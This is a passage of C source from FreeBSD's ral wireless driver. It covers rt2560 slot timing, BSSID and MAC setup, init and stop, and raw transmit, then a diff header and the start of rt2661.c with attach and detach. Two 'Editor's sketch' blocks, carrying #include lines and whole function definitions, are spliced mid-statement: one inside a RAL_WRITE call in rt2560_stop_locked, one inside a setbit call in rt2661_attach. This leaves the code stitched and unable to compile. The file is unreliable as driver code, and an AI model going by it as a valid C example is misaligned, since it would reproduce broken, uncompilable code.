0); tmp = 16 * vap->iv_bss->ni_intval; RAL_WRITE(sc, RT2560_CSR12, tmp); RAL_WRITE(sc, RT2560_CSR13, 0); logcwmin = 5; preload = (vap->iv_opmode == IEEE80211_M_STA) ? 384 : 1024; tmp = logcwmin << 16 | preload; RAL_WRITE(sc, RT2560_BCNOCSR, tmp); /* finally, enable TSF synchronization */ tmp = RT2560_ENABLE_TSF | RT2560_ENABLE_TBCN; if (ic->ic_opmode == IEEE80211_M_STA) tmp |= RT2560_ENABLE_TSF_SYNC(1); else tmp |= RT2560_ENABLE_TSF_SYNC(2) | RT2560_ENABLE_BEACON_GENERATOR; RAL_WRITE(sc, RT2560_CSR14, tmp); DPRINTF(sc, "%s", "enabling TSF synchronization\n"); } static void rt2560_enable_tsf(struct rt2560_softc *sc) { RAL_WRITE(sc, RT2560_CSR14, 0); RAL_WRITE(sc, RT2560_CSR14, RT2560_ENABLE_TSF_SYNC(2) | RT2560_ENABLE_TSF); } static void rt2560_update_plcp(struct rt2560_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; /* no short preamble for 1Mbps */ RAL_WRITE(sc, RT2560_PLCP1MCSR, 0x00700400); if (!(ic->ic_flags & IEEE80211_F_SHPREAMBLE)) { /* values taken from the reference driver */ RAL_WRITE(sc, RT2560_PLCP2MCSR, 0x00380401); RAL_WRITE(sc, RT2560_PLCP5p5MCSR, 0x00150402); RAL_WRITE(sc, RT2560_PLCP11MCSR, 0x000b8403); } else { /* same values as above or'ed 0x8 */ RAL_WRITE(sc, RT2560_PLCP2MCSR, 0x00380409); RAL_WRITE(sc, RT2560_PLCP5p5MCSR, 0x0015040a); RAL_WRITE(sc, RT2560_PLCP11MCSR, 0x000b840b); } DPRINTF(sc, "updating PLCP for %s preamble\n", (ic->ic_flags & IEEE80211_F_SHPREAMBLE) ? "short" : "long"); } /* * This function can be called by ieee80211_set_shortslottime(). Refer to * IEEE Std 802.11-1999 pp. 85 to know how these values are computed. */ static void rt2560_update_slot(struct ifnet *ifp) { struct rt2560_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; uint8_t slottime; uint16_t tx_sifs, tx_pifs, tx_difs, eifs; uint32_t tmp; #ifndef FORCE_SLOTTIME slottime = (ic->ic_flags & IEEE80211_F_SHSLOT) ? 
	    9 : 20;
#else
	/*
	 * Setting slot time according to "short slot time" capability
	 * in beacon/probe_resp seems to cause problems acknowledging
	 * certain APs' data frames transmitted at CCK/DS rates: the
	 * problematic AP keeps retransmitting data frames, probably
	 * because MAC level acks are not received by hardware.
	 * So we cheat a little bit here by claiming we are capable of
	 * "short slot time" but setting hardware slot time to the normal
	 * slot time.  ral(4) does not seem to have trouble receiving
	 * frames transmitted using short slot time even if hardware
	 * slot time is set to normal slot time.  If we didn't use this
	 * trick, we would have to claim that short slot time is not
	 * supported; this would give relatively poor RX performance
	 * (-1Mb~-2Mb lower) and the _whole_ BSS would stop using short
	 * slot time.
	 */
	slottime = 20;
#endif
	/* update the MAC slot boundaries */
	tx_sifs = RAL_SIFS - RT2560_TXRX_TURNAROUND;
	tx_pifs = tx_sifs + slottime;
	tx_difs = tx_sifs + 2 * slottime;
	eifs = (ic->ic_curmode == IEEE80211_MODE_11B) ? 364 : 60;

	tmp = RAL_READ(sc, RT2560_CSR11);
	tmp = (tmp & ~0x1f00) | slottime << 8;
	RAL_WRITE(sc, RT2560_CSR11, tmp);

	tmp = tx_pifs << 16 | tx_sifs;
	RAL_WRITE(sc, RT2560_CSR18, tmp);

	tmp = eifs << 16 | tx_difs;
	RAL_WRITE(sc, RT2560_CSR19, tmp);

	DPRINTF(sc, "setting slottime to %uus\n", slottime);
}

static void
rt2560_set_basicrates(struct rt2560_softc *sc,
    const struct ieee80211_rateset *rs)
{
#define	RV(r)	((r) & IEEE80211_RATE_VAL)
	struct ifnet *ifp = sc->sc_ifp;
	struct ieee80211com *ic = ifp->if_l2com;
	uint32_t mask = 0;
	uint8_t rate;
	int i;

	for (i = 0; i < rs->rs_nrates; i++) {
		rate = rs->rs_rates[i];

		if (!(rate & IEEE80211_RATE_BASIC))
			continue;

		mask |= 1 << ieee80211_legacy_rate_lookup(ic->ic_rt, RV(rate));
	}

	RAL_WRITE(sc, RT2560_ARSP_PLCP_1, mask);

	DPRINTF(sc, "Setting basic rate mask to 0x%x\n", mask);
#undef RV
}

static void
rt2560_update_led(struct rt2560_softc *sc, int led1, int led2)
{
	uint32_t tmp;

	/* set ON period to 70ms and OFF period to 30ms */
	tmp = led1 << 16 | led2 << 17 | 70 << 8 | 30;
	RAL_WRITE(sc, RT2560_LEDCSR, tmp);
}

static void
rt2560_set_bssid(struct rt2560_softc *sc, const uint8_t *bssid)
{
	uint32_t tmp;

	tmp = bssid[0] | bssid[1] << 8 | bssid[2] << 16 | bssid[3] << 24;
	RAL_WRITE(sc, RT2560_CSR5, tmp);

	tmp = bssid[4] | bssid[5] << 8;
	RAL_WRITE(sc, RT2560_CSR6, tmp);

	DPRINTF(sc, "setting BSSID to %6D\n", bssid, ":");
}

static void
rt2560_set_macaddr(struct rt2560_softc *sc, uint8_t *addr)
{
	uint32_t tmp;

	tmp = addr[0] | addr[1] << 8 | addr[2] << 16 | addr[3] << 24;
	RAL_WRITE(sc, RT2560_CSR3, tmp);

	tmp = addr[4] | addr[5] << 8;
	RAL_WRITE(sc, RT2560_CSR4, tmp);

	DPRINTF(sc, "setting MAC address to %6D\n", addr, ":");
}

static void
rt2560_get_macaddr(struct rt2560_softc *sc, uint8_t *addr)
{
	uint32_t tmp;

	tmp = RAL_READ(sc, RT2560_CSR3);
	addr[0] = tmp & 0xff;
	addr[1] = (tmp >> 8) & 0xff;
	addr[2] = (tmp >> 16) & 0xff;
	addr[3] = (tmp >> 24);

	tmp = RAL_READ(sc, RT2560_CSR4);
	addr[4] = tmp & 0xff;
	addr[5] = (tmp >> 8) & 0xff;
}

static void
rt2560_update_promisc(struct ifnet *ifp)
{
	struct rt2560_softc *sc = ifp->if_softc;
	uint32_t tmp;

	tmp = RAL_READ(sc, RT2560_RXCSR0);

	tmp &= ~RT2560_DROP_NOT_TO_ME;
	if (!(ifp->if_flags & IFF_PROMISC))
		tmp |= RT2560_DROP_NOT_TO_ME;

	RAL_WRITE(sc, RT2560_RXCSR0, tmp);

	DPRINTF(sc, "%s promiscuous mode\n", (ifp->if_flags & IFF_PROMISC) ?
"entering" : "leaving"); } static const char * rt2560_get_rf(int rev) { switch (rev) { case RT2560_RF_2522: return "RT2522"; case RT2560_RF_2523: return "RT2523"; case RT2560_RF_2524: return "RT2524"; case RT2560_RF_2525: return "RT2525"; case RT2560_RF_2525E: return "RT2525e"; case RT2560_RF_2526: return "RT2526"; case RT2560_RF_5222: return "RT5222"; default: return "unknown"; } } static void rt2560_read_config(struct rt2560_softc *sc) { uint16_t val; int i; val = rt2560_eeprom_read(sc, RT2560_EEPROM_CONFIG0); sc->rf_rev = (val >> 11) & 0x7; sc->hw_radio = (val >> 10) & 0x1; sc->led_mode = (val >> 6) & 0x7; sc->rx_ant = (val >> 4) & 0x3; sc->tx_ant = (val >> 2) & 0x3; sc->nb_ant = val & 0x3; /* read default values for BBP registers */ for (i = 0; i < 16; i++) { val = rt2560_eeprom_read(sc, RT2560_EEPROM_BBP_BASE + i); if (val == 0 || val == 0xffff) continue; sc->bbp_prom[i].reg = val >> 8; sc->bbp_prom[i].val = val & 0xff; } /* read Tx power for all b/g channels */ for (i = 0; i < 14 / 2; i++) { val = rt2560_eeprom_read(sc, RT2560_EEPROM_TXPOWER + i); sc->txpow[i * 2] = val & 0xff; sc->txpow[i * 2 + 1] = val >> 8; } for (i = 0; i < 14; ++i) { if (sc->txpow[i] > 31) sc->txpow[i] = 24; } val = rt2560_eeprom_read(sc, RT2560_EEPROM_CALIBRATE); if ((val & 0xff) == 0xff) sc->rssi_corr = RT2560_DEFAULT_RSSI_CORR; else sc->rssi_corr = val & 0xff; DPRINTF(sc, "rssi correction %d, calibrate 0x%02x\n", sc->rssi_corr, val); } static void rt2560_scan_start(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct rt2560_softc *sc = ifp->if_softc; /* abort TSF synchronization */ RAL_WRITE(sc, RT2560_CSR14, 0); rt2560_set_bssid(sc, ifp->if_broadcastaddr); } static void rt2560_scan_end(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct rt2560_softc *sc = ifp->if_softc; struct ieee80211vap *vap = ic->ic_scan->ss_vap; rt2560_enable_tsf_sync(sc); /* XXX keep local copy */ rt2560_set_bssid(sc, vap->iv_bss->ni_bssid); } static int rt2560_bbp_init(struct rt2560_softc *sc) { #define N(a) (sizeof (a) / sizeof ((a)[0])) int i, ntries; /* wait for BBP to be ready */ for (ntries = 0; ntries < 100; ntries++) { if (rt2560_bbp_read(sc, RT2560_BBP_VERSION) != 0) break; DELAY(1); } if (ntries == 100) { device_printf(sc->sc_dev, "timeout waiting for BBP\n"); return EIO; } /* initialize BBP registers to default values */ for (i = 0; i < N(rt2560_def_bbp); i++) { rt2560_bbp_write(sc, rt2560_def_bbp[i].reg, rt2560_def_bbp[i].val); } /* initialize BBP registers to values stored in EEPROM */ for (i = 0; i < 16; i++) { if (sc->bbp_prom[i].reg == 0 && sc->bbp_prom[i].val == 0) break; rt2560_bbp_write(sc, sc->bbp_prom[i].reg, sc->bbp_prom[i].val); } rt2560_bbp_write(sc, 17, 0x48); /* XXX restore bbp17 */ return 0; #undef N } static void rt2560_set_txantenna(struct rt2560_softc *sc, int antenna) { uint32_t tmp; uint8_t tx; tx = rt2560_bbp_read(sc, RT2560_BBP_TX) & ~RT2560_BBP_ANTMASK; if (antenna == 1) tx |= RT2560_BBP_ANTA; else if (antenna == 2) tx |= RT2560_BBP_ANTB; else tx |= RT2560_BBP_DIVERSITY; /* need to force I/Q flip for RF 2525e, 2526 and 5222 */ if (sc->rf_rev == RT2560_RF_2525E || sc->rf_rev == RT2560_RF_2526 || sc->rf_rev == RT2560_RF_5222) tx |= RT2560_BBP_FLIPIQ; rt2560_bbp_write(sc, RT2560_BBP_TX, tx); /* update values for CCK and OFDM in BBPCSR1 */ tmp = RAL_READ(sc, RT2560_BBPCSR1) & ~0x00070007; tmp |= (tx & 0x7) << 16 | (tx & 0x7); RAL_WRITE(sc, RT2560_BBPCSR1, tmp); } static void rt2560_set_rxantenna(struct rt2560_softc *sc, int antenna) { uint8_t rx; rx = rt2560_bbp_read(sc, 
RT2560_BBP_RX) & ~RT2560_BBP_ANTMASK; if (antenna == 1) rx |= RT2560_BBP_ANTA; else if (antenna == 2) rx |= RT2560_BBP_ANTB; else rx |= RT2560_BBP_DIVERSITY; /* need to force no I/Q flip for RF 2525e and 2526 */ if (sc->rf_rev == RT2560_RF_2525E || sc->rf_rev == RT2560_RF_2526) rx &= ~RT2560_BBP_FLIPIQ; rt2560_bbp_write(sc, RT2560_BBP_RX, rx); } static void rt2560_init_locked(struct rt2560_softc *sc) { #define N(a) (sizeof (a) / sizeof ((a)[0])) struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t tmp; int i; RAL_LOCK_ASSERT(sc); rt2560_stop_locked(sc); /* setup tx rings */ tmp = RT2560_PRIO_RING_COUNT << 24 | RT2560_ATIM_RING_COUNT << 16 | RT2560_TX_RING_COUNT << 8 | RT2560_TX_DESC_SIZE; /* rings must be initialized in this exact order */ RAL_WRITE(sc, RT2560_TXCSR2, tmp); RAL_WRITE(sc, RT2560_TXCSR3, sc->txq.physaddr); RAL_WRITE(sc, RT2560_TXCSR5, sc->prioq.physaddr); RAL_WRITE(sc, RT2560_TXCSR4, sc->atimq.physaddr); RAL_WRITE(sc, RT2560_TXCSR6, sc->bcnq.physaddr); /* setup rx ring */ tmp = RT2560_RX_RING_COUNT << 8 | RT2560_RX_DESC_SIZE; RAL_WRITE(sc, RT2560_RXCSR1, tmp); RAL_WRITE(sc, RT2560_RXCSR2, sc->rxq.physaddr); /* initialize MAC registers to default values */ for (i = 0; i < N(rt2560_def_mac); i++) RAL_WRITE(sc, rt2560_def_mac[i].reg, rt2560_def_mac[i].val); rt2560_set_macaddr(sc, IF_LLADDR(ifp)); /* set basic rate set (will be updated later) */ RAL_WRITE(sc, RT2560_ARSP_PLCP_1, 0x153); rt2560_update_slot(ifp); rt2560_update_plcp(sc); rt2560_update_led(sc, 0, 0); RAL_WRITE(sc, RT2560_CSR1, RT2560_RESET_ASIC); RAL_WRITE(sc, RT2560_CSR1, RT2560_HOST_READY); if (rt2560_bbp_init(sc) != 0) { rt2560_stop_locked(sc); return; } rt2560_set_txantenna(sc, sc->tx_ant); rt2560_set_rxantenna(sc, sc->rx_ant); /* set default BSS channel */ rt2560_set_chan(sc, ic->ic_curchan); /* kick Rx */ tmp = RT2560_DROP_PHY_ERROR | RT2560_DROP_CRC_ERROR; if (ic->ic_opmode != IEEE80211_M_MONITOR) { tmp |= RT2560_DROP_CTL | RT2560_DROP_VERSION_ERROR; if (ic->ic_opmode != IEEE80211_M_HOSTAP && ic->ic_opmode != IEEE80211_M_MBSS) tmp |= RT2560_DROP_TODS; if (!(ifp->if_flags & IFF_PROMISC)) tmp |= RT2560_DROP_NOT_TO_ME; } RAL_WRITE(sc, RT2560_RXCSR0, tmp); /* clear old FCS and Rx FIFO errors */ RAL_READ(sc, RT2560_CNT0); RAL_READ(sc, RT2560_CNT4); /* clear any pending interrupts */ RAL_WRITE(sc, RT2560_CSR7, 0xffffffff); /* enable interrupts */ RAL_WRITE(sc, RT2560_CSR8, RT2560_INTR_MASK); ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; ifp->if_drv_flags |= IFF_DRV_RUNNING; callout_reset(&sc->watchdog_ch, hz, rt2560_watchdog, sc); #undef N } static void rt2560_init(void *priv) { struct rt2560_softc *sc = priv; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; RAL_LOCK(sc); rt2560_init_locked(sc); RAL_UNLOCK(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) ieee80211_start_all(ic); /* start all vap's */ } static void rt2560_stop_locked(struct rt2560_softc *sc) { struct ifnet *ifp = sc->sc_ifp; volatile int *flags = &sc->sc_flags; RAL_LOCK_ASSERT(sc); while (*flags & RT2560_F_INPUT_RUNNING) msleep(sc, &sc->sc_mtx, 0, "ralrunning", hz/10); callout_stop(&sc->watchdog_ch); sc->sc_tx_timer = 0; if (ifp->if_drv_flags & IFF_DRV_RUNNING) { ifp->if_drv_flags &= ~(IFF_DRV_RUNNING | IFF_DRV_OACTIVE); /* abort Tx */ RAL_WRITE(sc, RT2560_TXCSR0, RT2560_ABORT_TX); /* disable Rx */ RAL_WRITE(sc, RT2560_RXCSR0, RT2560_DISABLE_RX); /* reset ASIC (imply reset BBP) */ RAL_WRITE(sc, RT2560_CSR1, RT2560_RESET_ASIC); RAL_WRITE(sc, RT2560_CSR1, 0); /* disable interrupts */ RAL_WRITE(sc, 
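/*
 * Editor's sketch: the Rx filter that rt2560_init_locked() above programs
 * into RT2560_RXCSR0, isolated as a pure function.  The bit values below are
 * placeholders standing in for the rt2560reg.h definitions; only the
 * decision logic (monitor mode keeps everything, AP/mesh modes keep ToDS
 * frames, promiscuous mode keeps frames not addressed to us) mirrors the
 * driver.
 */
#include <stdbool.h>
#include <stdint.h>

#define DROP_CRC_ERROR		(1u << 0)	/* placeholder bit positions */
#define DROP_PHY_ERROR		(1u << 1)
#define DROP_CTL		(1u << 2)
#define DROP_VERSION_ERROR	(1u << 3)
#define DROP_TODS		(1u << 4)
#define DROP_NOT_TO_ME		(1u << 5)

enum opmode { OP_STA, OP_HOSTAP, OP_MBSS, OP_MONITOR };

static uint32_t
rx_filter(enum opmode mode, bool promisc)
{
	uint32_t f = DROP_PHY_ERROR | DROP_CRC_ERROR;

	if (mode != OP_MONITOR) {
		f |= DROP_CTL | DROP_VERSION_ERROR;
		if (mode != OP_HOSTAP && mode != OP_MBSS)
			f |= DROP_TODS;		/* only APs forward ToDS frames */
		if (!promisc)
			f |= DROP_NOT_TO_ME;
	}
	return f;
}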
RT2560_CSR8, 0xffffffff); /* reset Tx and Rx rings */ rt2560_reset_tx_ring(sc, &sc->txq); rt2560_reset_tx_ring(sc, &sc->atimq); rt2560_reset_tx_ring(sc, &sc->prioq); rt2560_reset_tx_ring(sc, &sc->bcnq); rt2560_reset_rx_ring(sc, &sc->rxq); } sc->sc_flags &= ~(RT2560_F_PRIO_OACTIVE | RT2560_F_DATA_OACTIVE); } void rt2560_stop(void *arg) { struct rt2560_softc *sc = arg; RAL_LOCK(sc); rt2560_stop_locked(sc); RAL_UNLOCK(sc); } static int rt2560_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ic->ic_ifp; struct rt2560_softc *sc = ifp->if_softc; RAL_LOCK(sc); /* prevent management frames from being sent if we're not ready */ if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { RAL_UNLOCK(sc); m_freem(m); ieee80211_free_node(ni); return ENETDOWN; } if (sc->prioq.queued >= RT2560_PRIO_RING_COUNT) { ifp->if_drv_flags |= IFF_DRV_OACTIVE; sc->sc_flags |= RT2560_F_PRIO_OACTIVE; RAL_UNLOCK(sc); m_freem(m); ieee80211_free_node(ni); return ENOBUFS; /* XXX */ } ifp->if_opackets++; if (params == NULL) { /* * Legacy path; interpret frame contents to decide * precisely how to send the frame. */ if (rt2560_tx_mgt(sc, m, ni) != 0) goto bad; } else { /* * Caller supplied explicit parameters to use in * sending the frame. */ if (rt2560_tx_raw(sc, m, ni, params)) goto bad; } sc->sc_tx_timer = 5; RAL_UNLOCK(sc); return 0; bad: ifp->if_oerrors++; ieee80211_free_node(ni); RAL_UNLOCK(sc); return EIO; /* XXX */ } diff --git a/sys/dev/ral/rt2661.c b/sys/dev/ral/rt2661.c index 4c1dc565a2ae..7b621d7e7ae4 100644 --- a/sys/dev/ral/rt2661.c +++ b/sys/dev/ral/rt2661.c @@ -1,2845 +1,2845 @@ /* $FreeBSD$ */ /*- * Copyright (c) 2006 * Damien Bergamini * * Permission to use, copy, modify, and distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */ #include __FBSDID("$FreeBSD$"); /*- * Ralink Technology RT2561, RT2561S and RT2661 chipset driver * http://www.ralinktech.com/ */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define RAL_DEBUG #ifdef RAL_DEBUG #define DPRINTF(sc, fmt, ...) do { \ if (sc->sc_debug > 0) \ printf(fmt, __VA_ARGS__); \ } while (0) #define DPRINTFN(sc, n, fmt, ...) do { \ if (sc->sc_debug >= (n)) \ printf(fmt, __VA_ARGS__); \ } while (0) #else #define DPRINTF(sc, fmt, ...) #define DPRINTFN(sc, n, fmt, ...) 
#endif static struct ieee80211vap *rt2661_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void rt2661_vap_delete(struct ieee80211vap *); static void rt2661_dma_map_addr(void *, bus_dma_segment_t *, int, int); static int rt2661_alloc_tx_ring(struct rt2661_softc *, struct rt2661_tx_ring *, int); static void rt2661_reset_tx_ring(struct rt2661_softc *, struct rt2661_tx_ring *); static void rt2661_free_tx_ring(struct rt2661_softc *, struct rt2661_tx_ring *); static int rt2661_alloc_rx_ring(struct rt2661_softc *, struct rt2661_rx_ring *, int); static void rt2661_reset_rx_ring(struct rt2661_softc *, struct rt2661_rx_ring *); static void rt2661_free_rx_ring(struct rt2661_softc *, struct rt2661_rx_ring *); static int rt2661_newstate(struct ieee80211vap *, enum ieee80211_state, int); static uint16_t rt2661_eeprom_read(struct rt2661_softc *, uint8_t); static void rt2661_rx_intr(struct rt2661_softc *); static void rt2661_tx_intr(struct rt2661_softc *); static void rt2661_tx_dma_intr(struct rt2661_softc *, struct rt2661_tx_ring *); static void rt2661_mcu_beacon_expire(struct rt2661_softc *); static void rt2661_mcu_wakeup(struct rt2661_softc *); static void rt2661_mcu_cmd_intr(struct rt2661_softc *); static void rt2661_scan_start(struct ieee80211com *); static void rt2661_scan_end(struct ieee80211com *); static void rt2661_set_channel(struct ieee80211com *); static void rt2661_setup_tx_desc(struct rt2661_softc *, struct rt2661_tx_desc *, uint32_t, uint16_t, int, int, const bus_dma_segment_t *, int, int); static int rt2661_tx_data(struct rt2661_softc *, struct mbuf *, struct ieee80211_node *, int); static int rt2661_tx_mgt(struct rt2661_softc *, struct mbuf *, struct ieee80211_node *); static void rt2661_start_locked(struct ifnet *); static void rt2661_start(struct ifnet *); static int rt2661_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static void rt2661_watchdog(void *); static int rt2661_ioctl(struct ifnet *, u_long, caddr_t); static void rt2661_bbp_write(struct rt2661_softc *, uint8_t, uint8_t); static uint8_t rt2661_bbp_read(struct rt2661_softc *, uint8_t); static void rt2661_rf_write(struct rt2661_softc *, uint8_t, uint32_t); static int rt2661_tx_cmd(struct rt2661_softc *, uint8_t, uint16_t); static void rt2661_select_antenna(struct rt2661_softc *); static void rt2661_enable_mrr(struct rt2661_softc *); static void rt2661_set_txpreamble(struct rt2661_softc *); static void rt2661_set_basicrates(struct rt2661_softc *, const struct ieee80211_rateset *); static void rt2661_select_band(struct rt2661_softc *, struct ieee80211_channel *); static void rt2661_set_chan(struct rt2661_softc *, struct ieee80211_channel *); static void rt2661_set_bssid(struct rt2661_softc *, const uint8_t *); static void rt2661_set_macaddr(struct rt2661_softc *, const uint8_t *); static void rt2661_update_promisc(struct ifnet *); static int rt2661_wme_update(struct ieee80211com *) __unused; static void rt2661_update_slot(struct ifnet *); static const char *rt2661_get_rf(int); static void rt2661_read_eeprom(struct rt2661_softc *, uint8_t macaddr[IEEE80211_ADDR_LEN]); static int rt2661_bbp_init(struct rt2661_softc *); static void rt2661_init_locked(struct rt2661_softc *); static void rt2661_init(void *); static void rt2661_stop_locked(struct rt2661_softc *); static void rt2661_stop(void *); static int rt2661_load_microcode(struct rt2661_softc *); #ifdef notyet static 
void rt2661_rx_tune(struct rt2661_softc *); static void rt2661_radar_start(struct rt2661_softc *); static int rt2661_radar_stop(struct rt2661_softc *); #endif static int rt2661_prepare_beacon(struct rt2661_softc *, struct ieee80211vap *); static void rt2661_enable_tsf_sync(struct rt2661_softc *); static void rt2661_enable_tsf(struct rt2661_softc *); static int rt2661_get_rssi(struct rt2661_softc *, uint8_t); static const struct { uint32_t reg; uint32_t val; } rt2661_def_mac[] = { RT2661_DEF_MAC }; static const struct { uint8_t reg; uint8_t val; } rt2661_def_bbp[] = { RT2661_DEF_BBP }; static const struct rfprog { uint8_t chan; uint32_t r1, r2, r3, r4; } rt2661_rf5225_1[] = { RT2661_RF5225_1 }, rt2661_rf5225_2[] = { RT2661_RF5225_2 }; int rt2661_attach(device_t dev, int id) { struct rt2661_softc *sc = device_get_softc(dev); struct ieee80211com *ic; struct ifnet *ifp; uint32_t val; int error, ac, ntries; uint8_t bands; uint8_t macaddr[IEEE80211_ADDR_LEN]; sc->sc_id = id; sc->sc_dev = dev; ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(sc->sc_dev, "can not if_alloc()\n"); return ENOMEM; } ic = ifp->if_l2com; mtx_init(&sc->sc_mtx, device_get_nameunit(dev), MTX_NETWORK_LOCK, MTX_DEF | MTX_RECURSE); callout_init_mtx(&sc->watchdog_ch, &sc->sc_mtx, 0); /* wait for NIC to initialize */ for (ntries = 0; ntries < 1000; ntries++) { if ((val = RAL_READ(sc, RT2661_MAC_CSR0)) != 0) break; DELAY(1000); } if (ntries == 1000) { device_printf(sc->sc_dev, "timeout waiting for NIC to initialize\n"); error = EIO; goto fail1; } /* retrieve RF rev. no and various other things from EEPROM */ rt2661_read_eeprom(sc, macaddr); device_printf(dev, "MAC/BBP RT%X, RF %s\n", val, rt2661_get_rf(sc->rf_rev)); /* * Allocate Tx and Rx rings. */ for (ac = 0; ac < 4; ac++) { error = rt2661_alloc_tx_ring(sc, &sc->txq[ac], RT2661_TX_RING_COUNT); if (error != 0) { device_printf(sc->sc_dev, "could not allocate Tx ring %d\n", ac); goto fail2; } } error = rt2661_alloc_tx_ring(sc, &sc->mgtq, RT2661_MGT_RING_COUNT); if (error != 0) { device_printf(sc->sc_dev, "could not allocate Mgt ring\n"); goto fail2; } error = rt2661_alloc_rx_ring(sc, &sc->rxq, RT2661_RX_RING_COUNT); if (error != 0) { device_printf(sc->sc_dev, "could not allocate Rx ring\n"); goto fail3; } ifp->if_softc = sc; if_initname(ifp, device_get_name(dev), device_get_unit(dev)); ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_init = rt2661_init; ifp->if_ioctl = rt2661_ioctl; ifp->if_start = rt2661_start; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); ic->ic_ifp = ifp; ic->ic_opmode = IEEE80211_M_STA; ic->ic_phytype = IEEE80211_T_OFDM; /* not only, but not used */ /* set device capabilities */ ic->ic_caps = IEEE80211_C_STA /* station mode */ | IEEE80211_C_IBSS /* ibss, nee adhoc, mode */ | IEEE80211_C_HOSTAP /* hostap mode */ | IEEE80211_C_MONITOR /* monitor mode */ | IEEE80211_C_AHDEMO /* adhoc demo mode */ | IEEE80211_C_WDS /* 4-address traffic works */ | IEEE80211_C_MBSS /* mesh point link mode */ | IEEE80211_C_SHPREAMBLE /* short preamble supported */ | IEEE80211_C_SHSLOT /* short slot time supported */ | IEEE80211_C_WPA /* capable of WPA1+WPA2 */ | IEEE80211_C_BGSCAN /* capable of bg scanning */ #ifdef notyet | IEEE80211_C_TXFRAG /* handle tx frags */ | IEEE80211_C_WME /* 802.11e */ #endif ; bands = 0; setbit(&bands, IEEE80211_MODE_11B); setbit(&bands, IEEE80211_MODE_11G); if (sc->rf_rev == RT2661_RF_5225 || sc->rf_rev == RT2661_RF_5325) setbit(&bands, 
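/*
 * Editor's sketch: the bounded-poll idiom rt2661_attach() uses below while
 * waiting for RT2661_MAC_CSR0 to come up non-zero (up to 1000 probes with
 * DELAY(1000) between them), written as a standalone helper.  The register
 * read callback and the 1 ms granularity are assumptions of this sketch.
 */
#include <stdint.h>

static int
poll_ready(uint32_t (*read_reg)(void *), void *arg,
    void (*delay_us)(unsigned), int max_tries, uint32_t *valp)
{
	int i;

	for (i = 0; i < max_tries; i++) {
		uint32_t v = read_reg(arg);
		if (v != 0) {
			*valp = v;
			return 0;		/* device responded */
		}
		delay_us(1000);			/* 1 ms between probes */
	}
	return -1;				/* caller maps this to EIO */
}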
IEEE80211_MODE_11A); ieee80211_init_channels(ic, NULL, &bands); ieee80211_ifattach(ic, macaddr); #if 0 ic->ic_wme.wme_update = rt2661_wme_update; #endif ic->ic_scan_start = rt2661_scan_start; ic->ic_scan_end = rt2661_scan_end; ic->ic_set_channel = rt2661_set_channel; ic->ic_updateslot = rt2661_update_slot; ic->ic_update_promisc = rt2661_update_promisc; ic->ic_raw_xmit = rt2661_raw_xmit; ic->ic_vap_create = rt2661_vap_create; ic->ic_vap_delete = rt2661_vap_delete; ieee80211_radiotap_attach(ic, &sc->sc_txtap.wt_ihdr, sizeof(sc->sc_txtap), RT2661_TX_RADIOTAP_PRESENT, &sc->sc_rxtap.wr_ihdr, sizeof(sc->sc_rxtap), RT2661_RX_RADIOTAP_PRESENT); #ifdef RAL_DEBUG SYSCTL_ADD_INT(device_get_sysctl_ctx(dev), SYSCTL_CHILDREN(device_get_sysctl_tree(dev)), OID_AUTO, "debug", CTLFLAG_RW, &sc->sc_debug, 0, "debug msgs"); #endif if (bootverbose) ieee80211_announce(ic); return 0; fail3: rt2661_free_tx_ring(sc, &sc->mgtq); fail2: while (--ac >= 0) rt2661_free_tx_ring(sc, &sc->txq[ac]); fail1: mtx_destroy(&sc->sc_mtx); if_free(ifp); return error; } int rt2661_detach(void *xsc) { struct rt2661_softc *sc = xsc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; RAL_LOCK(sc); rt2661_stop_locked(sc); RAL_UNLOCK(sc); ieee80211_ifdetach(ic); rt2661_free_tx_ring(sc, &sc->txq[0]); rt2661_free_tx_ring(sc, &sc->txq[1]); rt2661_free_tx_ring(sc, &sc->txq[2]); rt2661_free_tx_ring(sc, &sc->txq[3]); rt2661_free_tx_ring(sc, &sc->mgtq); rt2661_free_rx_ring(sc, &sc->rxq); if_free(ifp); mtx_destroy(&sc->sc_mtx); return 0; } static struct ieee80211vap * rt2661_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const 